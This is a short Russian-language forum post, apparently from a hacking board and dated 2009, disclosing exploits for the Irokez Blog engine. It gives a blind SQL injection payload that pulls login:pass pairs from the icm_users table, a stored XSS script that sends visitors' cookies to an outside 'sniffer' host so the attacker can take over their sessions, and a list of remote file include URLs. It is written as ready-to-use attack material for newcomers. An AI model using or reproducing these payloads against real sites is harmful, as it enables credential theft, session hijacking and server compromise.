![]() |
Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS
Очередной движек автор которого видимо не имеет представления о безопасном программировании. Ничего особо интересного, но для новичков копающих чужие сорцы будет полезно.
Application: Irokez Blog ------------ Website: http://irokez.org -------- Version: All (0.7.3.2) -------- Date: 11-02-2009 ----- [ BLIND SQL-INJECTION ] [ SOME VULNERABLE CODE ] PHP код:
http://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and '115 http://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))='114 etc [ ACTIVE XSS ] В комментариях. Уводим сессию, вставляем в куки. [ SOME VULNERABLE CODE ] PHP код:
<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script> [ INCLUDE ] Через суперглобальный массив. [ SOME VULNERABLE CODE ] PHP код:
http://irokez/modules/tml/block.tag.php?GLOBALS[PTH][classes]=[include] http://irokez/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=[include] http://irokez/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=[include] http://irokez/spaw/spaw_control.class.php?GLOBALS[spaw_root]=[include] итд |
http://site/irokezblog/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=[include]
http://site/iirokezblog/scripts/search.scr.php?GLOBALS[PTH][classes]=[include] http://site/irokezblog/scripts/archive.scr.php?GLOBALS[PTH][classes]=[include] |
| Время: 01:39 |